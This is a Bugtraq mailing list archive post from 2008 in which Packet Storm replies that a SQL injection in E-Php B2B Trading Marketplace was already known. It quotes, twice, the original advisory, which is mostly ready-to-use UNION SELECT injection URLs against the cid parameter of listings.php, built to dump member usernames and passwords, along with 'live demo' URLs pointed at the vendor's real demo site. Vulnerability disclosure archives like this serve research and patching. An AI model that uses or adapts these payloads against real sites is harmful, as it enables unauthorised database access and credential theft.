Bugtraq mailing list archives
Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
From: packet () packetstormsecurity org
Date: Wed, 10 Sep 2008 12:38:48 -0400
Already discovered: http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading Marketplace Scripts suffers from a remote SQL injection vulnerability in listings.php. Homepage: <a href="http://www.darkc0de.com/"; target="ext">http://www.darkc0de.com/.</a> Authored By <a href="mailto:r45c4l[at]hotmail.com";>r45c4l</a> On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote:
|___________________________________________________| | | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : WwW.Hussin-X.CoM <http://www.hussin-x.com/> | www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | | |___________________________________________________ | | | | script : http://www.ephpscripts.com | |___________________________________________________| Exploit: www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members -- L!VE DEMO: : INFO http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members -- http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members -- ____________________________( Greetz )_________________________________ | | All members of the Forum WwW.Hussin-X.CoM <http://www.hussin-x.com/> | WwW.TrYaG.CC <http://www.tryag.cc/> | | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori |______________________________________________________________________ Im IRAQi
|___________________________________________________| | | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : WwW.Hussin-X.CoM | www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | | |___________________________________________________ | | | | script : http://www.ephpscripts.com | |___________________________________________________| Exploit: www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- L!VE DEMO: : INFO http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members-- http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- ____________________________( Greetz )_________________________________ | | All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC | | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori |______________________________________________________________________ Im IRAQi
Current thread:
- Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability packet (Sep 10)